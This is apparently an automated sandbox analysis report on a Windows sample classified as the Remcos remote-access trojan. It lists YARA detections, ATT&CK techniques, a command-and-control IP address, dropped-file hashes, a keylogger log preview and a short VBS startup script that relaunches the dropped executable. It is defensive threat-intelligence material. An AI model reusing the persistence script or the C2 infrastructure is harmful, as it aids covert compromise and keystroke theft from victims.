                  Source: ambiparous.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                  Remote Access Functionality

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-ZFXG9YJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-ZFXG9YJump to behavior
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3786705466.0000000004EDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3786396527.0000000003200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3786431770.0000000003212000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 7880, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 8128, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8168, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: cmd.exe3_2_0040569A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: cmd.exe8_2_0040569A
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003B6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_003B6283
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003B6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003B6747
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B66283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00B66283
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B66747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00B66747
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting
                  2
                  Valid Accounts
                  1
                  Native API
                  111
                  Scripting
                  1
                  Exploitation for Privilege Escalation
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  11
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  221
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol221
                  Input Capture
                  2
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  2
                  Valid Accounts
                  1
                  Bypass User Account Control
                  2
                  Obfuscated Files or Information
                  2
                  Credentials In Files
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares3
                  Clipboard Data
                  1
                  Remote Access Software
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Windows Service
                  2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  NTDS3
                  File and Directory Discovery
                  Distributed Component Object ModelInput Capture1
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                  Registry Run Keys / Startup Folder
                  21
                  Access Token Manipulation
                  1
                  Bypass User Account Control
                  LSA Secrets126
                  System Information Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Windows Service
                  1
                  Masquerading
                  Cached Domain Credentials231
                  Security Software Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items422
                  Process Injection
                  2
                  Valid Accounts
                  DCSync1
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
                  Registry Run Keys / Startup Folder
                  1
                  Virtualization/Sandbox Evasion
                  Proc Filesystem3
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow11
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron422
                  Process Injection
                  Network Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1588332 Sample: OKkUGRkZV7.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 37 Suricata IDS alerts for network traffic 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 10 other signatures 2->43 8 OKkUGRkZV7.exe 4 2->8         started        12 wscript.exe 1 2->12         started        process3 file4 29 C:\Users\user\AppData\...\ambiparous.exe, PE32 8->29 dropped 57 Binary is likely a compiled AutoIt script file 8->57 14 ambiparous.exe 2 8->14         started        59 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->59 18 ambiparous.exe 1 12->18         started        signatures5 process6 file7 33 C:\Users\user\AppData\...\ambiparous.vbs, data 14->33 dropped 61 Multi AV Scanner detection for dropped file 14->61 63 Binary is likely a compiled AutoIt script file 14->63 65 Machine Learning detection for dropped file 14->65 71 2 other signatures 14->71 20 svchost.exe 2 14->20         started        67 Writes to foreign memory regions 18->67 69 Maps a DLL or memory area into another process 18->69 23 svchost.exe 2 2 18->23         started        signatures8 process9 dnsIp10 45 Contains functionality to bypass UAC (CMSTPLUA) 20->45 47 Detected Remcos RAT 20->47 49 Contains functionalty to change the wallpaper 20->49 55 7 other signatures 20->55 27 iexplore.exe 20->27         started        35 192.3.64.152, 2559, 49857, 49974 AS-COLOCROSSINGUS United States 23->35 31 C:\ProgramData\remcos\logs.dat, data 23->31 dropped 51 System process connects to network (likely due to code injection or exploit) 23->51 53 Installs a global keyboard hook 23->53 file11 signatures12 process13

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  OKkUGRkZV7.exe61%VirustotalBrowse
                  OKkUGRkZV7.exe66%ReversingLabsWin32.Backdoor.Remcos
                  OKkUGRkZV7.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\lecheries\ambiparous.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\lecheries\ambiparous.exe66%ReversingLabsWin32.Backdoor.Remcos
                  C:\Users\user\AppData\Local\lecheries\ambiparous.exe61%VirustotalBrowse
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpsvchost.exefalse
                      high
                      http://geoplugin.net/json.gp/Cambiparous.exe, 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, ambiparous.exe, 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        192.3.64.152
                        unknownUnited States
                        36352AS-COLOCROSSINGUStrue
                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1588332
                        Start date and time:2025-01-11 00:05:45 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 10m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:14
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:OKkUGRkZV7.exe
                        renamed because original name is a hash value
                        Original Sample Name:12f38b57f20acea350ed883756309c9516c6b5b814ebedcb19dcb5ba798579e1.exe
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.expl.evad.winEXE@12/7@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 57
                        • Number of non-executed functions: 278
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        TimeTypeDescription
                        00:06:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs
                        18:07:36API Interceptor4841384x Sleep call for process: svchost.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        192.3.64.152MLxloAVuCZ.exeGet hashmaliciousRemcosBrowse
                          1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                            LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                              EIuz8Bk9kGav2ix.exeGet hashmaliciousRemcosBrowse
                                6Ctc0o7vhqKgjU7.exeGet hashmaliciousRemcosBrowse
                                  New Order.exeGet hashmaliciousRemcosBrowse
                                    UsoOuMVYCv8QrxG.exeGet hashmaliciousRemcosBrowse
                                      New Order.exeGet hashmaliciousRemcosBrowse
                                        SecuriteInfo.com.Trojan.PackedNET.3042.4675.2937.exeGet hashmaliciousRemcosBrowse
                                          Quote.exeGet hashmaliciousRemcosBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            s-part-0017.t-0009.t-msedge.nethttps://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 13.107.246.45
                                            240815025266174071.jsGet hashmaliciousStrela DownloaderBrowse
                                            • 13.107.246.45
                                            hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                            • 13.107.246.45
                                            Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 13.107.246.45
                                            WN9uCxgU1T.exeGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                            • 13.107.246.45
                                            Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 13.107.246.45
                                            Qz8OEUxYuH.exeGet hashmaliciousFormBookBrowse
                                            • 13.107.246.45
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            AS-COLOCROSSINGUSNssBkEQKsI.exeGet hashmaliciousRemcosBrowse
                                            • 192.210.150.26
                                            l1QC9H0SNR.exeGet hashmaliciousRemcosBrowse
                                            • 192.210.150.26
                                            MLxloAVuCZ.exeGet hashmaliciousRemcosBrowse
                                            • 192.3.64.152
                                            bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                            • 192.210.150.26
                                            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                            • 192.3.27.144
                                            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                            • 192.3.27.144
                                            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                            • 192.3.27.144
                                            sh4.elfGet hashmaliciousMiraiBrowse
                                            • 23.95.117.229
                                            sweetnessgoodforgreatnessthingswithgood.tIF.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 192.3.27.144
                                            begoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                            • 192.3.27.144
                                            No context
                                            No context
                                            Process:C:\Windows\SysWOW64\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):144
                                            Entropy (8bit):3.3683413243328855
                                            Encrypted:false
                                            SSDEEP:3:rglsOlfUldlfPlWfpFi5JWRal2Jl+7R0DAlBG45klovDl6v:Mls6Uln425YcIeeDAlOWAv
                                            MD5:2BCAB8B7AECECBC8BA0AE1D4FC0211BF
                                            SHA1:44CEC12FE41B0FBD046DF67817E307FB9027EBE5
                                            SHA-256:F64DC38838ED1B44E96B609BEF2B642E784DED1C0D87E8AECB18767FE852C349
                                            SHA-512:D7202673496BEC10A782E27A417141553FAE8FAA49E44632BEB4D32535B7AB3AFB9A09D552A0CD80EAB05D6A6C4CA1E45A1696E0C7EEDA0D94A1C3F64D3F9EC6
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                            Reputation:low
                                            Preview:....[.2.0.2.5./.0.1./.1.0. .1.8.:.0.7.:.0.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                            Process:C:\Users\user\AppData\Local\lecheries\ambiparous.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):398740
                                            Entropy (8bit):7.944649802781788
                                            Encrypted:false
                                            SSDEEP:12288:L5aGzSggRst9XijY0a9cxInNeiQYYcHvMBdz:dfz0st9B0AsuUvrgUl
                                            MD5:2F27F8C2D7DAA4BF537C692FDA7ED077
                                            SHA1:2B46E686A3D83B3E8DC894C7B9895227655881C7
                                            SHA-256:D33F0DD622F656AF29139344A4A40DFCD64369465FCC7CA661F1012FE43EAF09
                                            SHA-512:9E2793980C5268A1D64D06A8F05E213C1215429492E0EE339ECA9786FF35EE6689A7C830008F240ECC5B2F26563B0A6E45E88747421D728DEF23A1E3BB832B6A
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06.....@4....H..&....kK........Z...`.....}U...M..(..d..`.M ..jA(..g.9.Js"..r..nA5.U..:..Ma....X..........e.H.6...Bh.9..U..Bd^9...........!1.......m... ..<...0e.RI.,.`.]3sx.....y.....I|..%`......D...M..5....m...0......m...7.....!..j.p......i.l.eO.v.....hkSzU"c@.PiS.}..7.0.7).>.J.<4...B.....:.D.M..*4.......C..$b.Z...s..".(.ld.....c...N.v.:].b..j&T.,D....L.....A.R/ ..6..`.....L...<..C=...m...n..m)3...P.....'.a.Mev...S5..i.....S. ..Y0.T....E..T.....=..`.L.....A...<|.....o.Vg... .a.L.Q*..f....J..m^Q!.....`.`.R@'32.x.iTi..0...Q1A....JH......*.yeN.H.......A..0-. ..............A.Rh...w.<....|....&..;A...%<.T:.....S.f3..C(}.=b.8...........#...?S..R(v.or....".(M..0.{.....m.R._9%#.B(;-...`...<....x...x..!+..a.....B.[1.....@.W.$...........@.b.........Q.\4...ef..N.....TR..3f.0......a..`bEz..4.p..l...0,g~.......u"S;..;....0...s.g..b.........1..D.`...1`....1~/.P.CqD......C.l.....B...J.\..Cuy..ur^=".P........3.Dp]....`.p.6.d8..9....`.......(.1..p.`...3.....1c<q....7..$.P
                                            Process:C:\Users\user\Desktop\OKkUGRkZV7.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):398740
                                            Entropy (8bit):7.944649802781788
                                            Encrypted:false
                                            SSDEEP:12288:L5aGzSggRst9XijY0a9cxInNeiQYYcHvMBdz:dfz0st9B0AsuUvrgUl
                                            MD5:2F27F8C2D7DAA4BF537C692FDA7ED077
                                            SHA1:2B46E686A3D83B3E8DC894C7B9895227655881C7
                                            SHA-256:D33F0DD622F656AF29139344A4A40DFCD64369465FCC7CA661F1012FE43EAF09
                                            SHA-512:9E2793980C5268A1D64D06A8F05E213C1215429492E0EE339ECA9786FF35EE6689A7C830008F240ECC5B2F26563B0A6E45E88747421D728DEF23A1E3BB832B6A
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06.....@4....H..&....kK........Z...`.....}U...M..(..d..`.M ..jA(..g.9.Js"..r..nA5.U..:..Ma....X..........e.H.6...Bh.9..U..Bd^9...........!1.......m... ..<...0e.RI.,.`.]3sx.....y.....I|..%`......D...M..5....m...0......m...7.....!..j.p......i.l.eO.v.....hkSzU"c@.PiS.}..7.0.7).>.J.<4...B.....:.D.M..*4.......C..$b.Z...s..".(.ld.....c...N.v.:].b..j&T.,D....L.....A.R/ ..6..`.....L...<..C=...m...n..m)3...P.....'.a.Mev...S5..i.....S. ..Y0.T....E..T.....=..`.L.....A...<|.....o.Vg... .a.L.Q*..f....J..m^Q!.....`.`.R@'32.x.iTi..0...Q1A....JH......*.yeN.H.......A..0-. ..............A.Rh...w.<....|....&..;A...%<.T:.....S.f3..C(}.=b.8...........#...?S..R(v.or....".(M..0.{.....m.R._9%#.B(;-...`...<....x...x..!+..a.....B.[1.....@.W.$...........@.b.........Q.\4...ef..N.....TR..3f.0......a..`bEz..4.p..l...0,g~.......u"S;..;....0...s.g..b.........1..D.`...1`....1~/.P.CqD......C.l.....B...J.\..Cuy..ur^=".P........3.Dp]....`.p.6.d8..9....`.......(.1..p.`...3.....1c<q....7..$.P
                                            Process:C:\Users\user\AppData\Local\lecheries\ambiparous.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):398740
                                            Entropy (8bit):7.944649802781788
                                            Encrypted:false
                                            SSDEEP:12288:L5aGzSggRst9XijY0a9cxInNeiQYYcHvMBdz:dfz0st9B0AsuUvrgUl
                                            MD5:2F27F8C2D7DAA4BF537C692FDA7ED077
                                            SHA1:2B46E686A3D83B3E8DC894C7B9895227655881C7
                                            SHA-256:D33F0DD622F656AF29139344A4A40DFCD64369465FCC7CA661F1012FE43EAF09
                                            SHA-512:9E2793980C5268A1D64D06A8F05E213C1215429492E0EE339ECA9786FF35EE6689A7C830008F240ECC5B2F26563B0A6E45E88747421D728DEF23A1E3BB832B6A
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06.....@4....H..&....kK........Z...`.....}U...M..(..d..`.M ..jA(..g.9.Js"..r..nA5.U..:..Ma....X..........e.H.6...Bh.9..U..Bd^9...........!1.......m... ..<...0e.RI.,.`.]3sx.....y.....I|..%`......D...M..5....m...0......m...7.....!..j.p......i.l.eO.v.....hkSzU"c@.PiS.}..7.0.7).>.J.<4...B.....:.D.M..*4.......C..$b.Z...s..".(.ld.....c...N.v.:].b..j&T.,D....L.....A.R/ ..6..`.....L...<..C=...m...n..m)3...P.....'.a.Mev...S5..i.....S. ..Y0.T....E..T.....=..`.L.....A...<|.....o.Vg... .a.L.Q*..f....J..m^Q!.....`.`.R@'32.x.iTi..0...Q1A....JH......*.yeN.H.......A..0-. ..............A.Rh...w.<....|....&..;A...%<.T:.....S.f3..C(}.=b.8...........#...?S..R(v.or....".(M..0.{.....m.R._9%#.B(;-...`...<....x...x..!+..a.....B.[1.....@.W.$...........@.b.........Q.\4...ef..N.....TR..3f.0......a..`bEz..4.p..l...0,g~.......u"S;..;....0...s.g..b.........1..D.`...1`....1~/.P.CqD......C.l.....B...J.\..Cuy..ur^=".P........3.Dp]....`.p.6.d8..9....`.......(.1..p.`...3.....1c<q....7..$.P
                                            Process:C:\Users\user\Desktop\OKkUGRkZV7.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):494592
                                            Entropy (8bit):7.542100190762085
                                            Encrypted:false
                                            SSDEEP:6144:Flc5kW5Yzs13Cc3bOScUAAEDc2TDZQHNGINX6s6fQmKEy44ekeklnLWiS9qc/oRn:HUYzsxhbOv/Rg2TVRINB5JekBLzoxJmZ
                                            MD5:8479F2723F780796C7534696DC950CBB
                                            SHA1:5B2D9C8B8FC13D92AA7356CBF85BBA365301398D
                                            SHA-256:5C33AA73C78D8C92CD6B1820F6F04A646F915B134C9AE0E3E8B7B0900D07CB92
                                            SHA-512:67E3514B4A1B68CBB171B1CC5CB8A658277000213D6F87BBA9C73F0A6869C6018EB9F168A3E560A4A7AAFEBB198761B0EACBF86C0375EAC855640C0130CE8F1A
                                            Malicious:false
                                            Reputation:low
                                            Preview:...K@0NHE85O..5K.0NHA85O.Z5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OY[5KM/.FA.<.`.4.... (K.?35R9"]n+ V[ 5zW.cB;&aQ[o..fk._*-o58EeZ5KC0NHMC.b.@.5.*.6.".1...5.*.6...1.@.5..j6.".1.8g5.*.6..$1.@.5.t.7.".1...41*.6.|.0+@.5.R.6.".1.@.55+.6.|.0m@.5.tg6.".1...4.*.6.QV'.@.5C0NHA85OAZ5KC0NHA85OAZ5K.uNH.92O...-C0NHA85O.Z7JH1@HAJ0OAL7KC0NH.r6OAJ5KC.KHA8uOAJ5KC2NHD84OAZ5KF0OHA85OAz=KC4NHA85OCZ5.C0^HA(5OAZ%KC NHA85OQZ5KC0NHA85O..3KG1NHA.2O..5KC0NHA85OAZ5KC0NHA.2O.a5K..HHy85OAZ5KC0NHA85OAZ5K..HHY85O.3K.0NHA85OAZ5KC.KHA=5OAZ5KC0NHA85OAZ5KC0NHA85Oo.P370NH.I0OAJ5KCBKHA<5OAZ5KC0NHA85OaZ5+mB*)5Y5O.#4KC.KHAB4OA,0KC0NHA85OAZ5K.0N.o\T; Z5K.mNHA(2OAT5KC.HHA85OAZ5KC0NH.85.o.Y8C0NHH85OA*2KC2NHA.3OAZ5KC0NHA85O.Z5.mW(!%K5OqX5KC.IHA<5OAZ2KC0NHA85OAZ5K.0N.oJF="Z5K.{NHA.2OA.5KC4IHA85OAZ5KC0NH.85.o(P',SNH..5OA.2KC.NHAh2OAZ5KC0NHA85O.Z5.C0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5KC0NHA85OAZ5K
                                            Process:C:\Users\user\Desktop\OKkUGRkZV7.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1323520
                                            Entropy (8bit):7.296986518920411
                                            Encrypted:false
                                            SSDEEP:24576:Qu6J33O0c+JY5UZ+XC0kGso6Fauf9v8AWLJgm9Ko2YyVWY:au0c++OCvkGs9Fauf9vJwJH9cYvY
                                            MD5:F484F16874DDB071B45CB9F1FA8D0C56
                                            SHA1:8CF9F6AB9A0A8520650145AE1702CC35F0E4B123
                                            SHA-256:12F38B57F20ACEA350ED883756309C9516C6B5B814EBEDCB19DCB5BA798579E1
                                            SHA-512:A20A46F56D408E9B2B5DCF956C9DEC9A1170885FBBCB7C24A8CAA6ED7202C30309BC72DC7A4C193DDB6F13CDC4C94E5F105E6D76CDFF5B1D0585C7D807318E15
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 66%
                                            • Antivirus: Virustotal, Detection: 61%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L....tVg.........."..........P.......}............@.................................'.....@...@.......@.....................L...|....p..D.................... ...q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...D....p......................@..@.reloc...q... ...r..................@..B........................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\lecheries\ambiparous.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):280
                                            Entropy (8bit):3.3838457202027814
                                            Encrypted:false
                                            SSDEEP:6:DMM8lfm3OOQdUfclmVzUEZ+lX1Rak0BnriIM8lfQVn:DsO+vNlGQ1WmA2n
                                            MD5:9D937E23D7FAB1953CABD2D8CCD23C28
                                            SHA1:9D8ED59C846CA6BF670D49161966591D9C7CA69D
                                            SHA-256:B1CB4C33F22996455957EDD565897A9118CC3A7E1894C394D492C7B48E698D5F
                                            SHA-512:7CB6F2B994B4482D4464742EA24A44522F352F51AB15D7B45935A9D712C4FCC5956B3C0E7E6338AF54D616D4C58660AE05C72F58A2B54996256798830B61722B
                                            Malicious:true
                                            Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.l.e.c.h.e.r.i.e.s.\.a.m.b.i.p.a.r.o.u.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.296986518920411
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:OKkUGRkZV7.exe
                                            File size:1'323'520 bytes
